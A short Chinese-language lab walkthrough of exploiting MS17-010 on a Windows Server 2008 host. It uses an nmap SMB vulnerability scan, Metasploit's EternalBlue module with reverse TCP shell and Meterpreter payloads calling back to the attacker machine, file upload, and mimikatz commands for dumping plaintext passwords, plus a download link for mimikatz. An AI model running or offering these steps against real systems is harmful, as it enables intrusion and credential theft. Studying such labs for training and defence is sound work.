環境
- 被攻擊目標IP: 192.168.118.137 系統類型:windows server 2008
- 攻擊IP(黑客主機): 192.168.118.130 系統類型: KALI
使用nmap 探測smb漏洞
nmap -p139,445 -Pn -n --script smb-vuln-* 192.168.118.137
#掃描結果顯示存在 MS17-010漏洞
# -Pn :跳過主機存活監測
# -n: 關閉域名查詢
# smb-vuln-*: *指代以smb-vuln-所有的漏洞腳本
使用Metasploit攻擊
-
啟動MSF: msfconsole
-
搜索攻擊模塊:search ms17-010
-
加載模塊:
use exploit/windows/smb/ms17_010_eternalblue

使用show options 或者options查看選項設置
可以使用show targets來查看可以攻擊的系統版本
使用show payloads可以加載所有可以使用的攻擊向量

設置攻擊目標
set RHOST 192.168.118.137

設置並加載payload:
set payload generic/shell_reverse_tcp
並設置反彈shell連接的地址和端口,默認端口是4444
set LHOST 192.168.118.130

使用命令expolit或者run進行攻擊:攻擊成功后會反彈shell

PAYLOAD2 持久會話
#接着上面的繼續使用下面的payload,可以進行文件上傳
set payload windows/x64/meterpreter/reverse_tcp

然后使用 run

Meterpreter session 2 opened (192.168.118.130:4444 -> 192.168.118.137:49159) at 2018-09-13 15:42:36 +0800
這句話告訴我們反彈了一個會話本機的4444到目標主機的49159
使用命令進入會話: sessions 2
使用upload 上傳文件,將本機的/root/x64/的文件上傳到目標主機
mimikatz 獲取hash 以及明文密碼
下載地址:https://pan.baidu.com/s/1RX9FGQRUtZJQQ_6Lyq1m-Q 密碼:coxc
下面我們利用mimikatz獲取目標主機的管理員密碼:
輸入shell進入目標主機的CMD
mimikatz使用幫助:
輸入xxx::能夠看看mimikatz的命令幫助
輸入privilege::回車能看到privilege的命令幫助
輸入privilege::debug進行提權操作
輸入sekurlsa::logonPasswords獲取windows用戶密碼


END